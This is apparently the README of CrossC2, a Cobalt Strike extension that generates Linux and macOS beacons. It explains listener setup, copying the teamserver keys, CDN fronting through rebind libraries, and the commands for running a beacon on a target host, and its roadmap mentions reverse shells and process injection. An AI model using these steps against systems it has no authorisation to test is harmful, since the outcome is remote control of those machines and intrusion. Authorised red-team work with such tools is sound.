README | 中文文档 | README_FULL | 中文完整文档

Support CobaltStrike's security assessment of other platforms (Linux/MacOS/...), and include the development support of Unix post-penetration module

1. Download

Download CrossC2.cna genCrossC2 CrossC2Kit, modify CrossC2.cna configuration

2. Create listener and copy key

• Create windows/beacon_https/reverse_https listener
• Copy .cobaltstrike.beacon_keys in teamserver directory to local

3. Function extension

• Add CrossC2Kit_Loader.cna, including memory loading and other functions
• cs4.x version file management, process list function is missing, you must use this Loader to restart

4. Generate beacon

Use the GUI function provided by cli or cna to generate beacon by default

• When teamserver is configured with c2profile, the rebind library needs to be generated in advance for use when generating beacon
• When using the forwarding method, in addition to specifying the rebind library, you also need to pay attention to the C2_HOST field when generating:
  • When the service provider uses the HTTP request content to verify the type, it needs to specify the CDN IP list: genCrossC2 1.1.1.1,2.2.2.2,3.3.3.3,xxx.xxx.xxx.xx ...
  • When the CDN server is verified by SNI, CDN operators such as Cloudflare need to specify the domain name bound to the CDN: genCrossC2 c2.domain.com ...

Rebind library related introduction:

• 📖wiki
• Demo:
  • C2Profile demo 📄demo_c2profile.profile 📄demo_c2profil_rebind.c
  • UDP communication demo 📄demo_udp_proxy_server.c 📄demo_udp_rebind.c
• Issues: 🏷issue #65 (Example of data transfer and c2profile field correspondence)、🏷issue #89 (Data processing example)

5. Run beacon

• Run the one-click online script generated by the CrossC2 plugin on the target
• After uploading the beacon to the target machine for empowered operation
• Set the working directory for beacon and run: export CCPATH=/opt/ && /tmp/c2
• Temporarily specify the protocol library for beacon and run: /tmp/c2 /tmp/c2-rebind.so
• Temporarily set C2 configuration for beacon: export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
• Set DEBUG to view the online status of beacon: export CCDEBUG=1 && /tmp/c2

Only for internal use by enterprises and organizations, this framework has a certain degree of instability. Non-professionals are not allowed to use it. Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

1. http-proxy (auth) & socks proxy back connection support
2. node beacon? (Single node type, can host other beacon without relying on teamserver)
3. Linux & MacOS side so/dylib's reverse shell support, and its derivative process injection functions

Thanks to @Emma for the Logo designed for CrossC2, which is designed in the style of Armitage and CobaltStrike series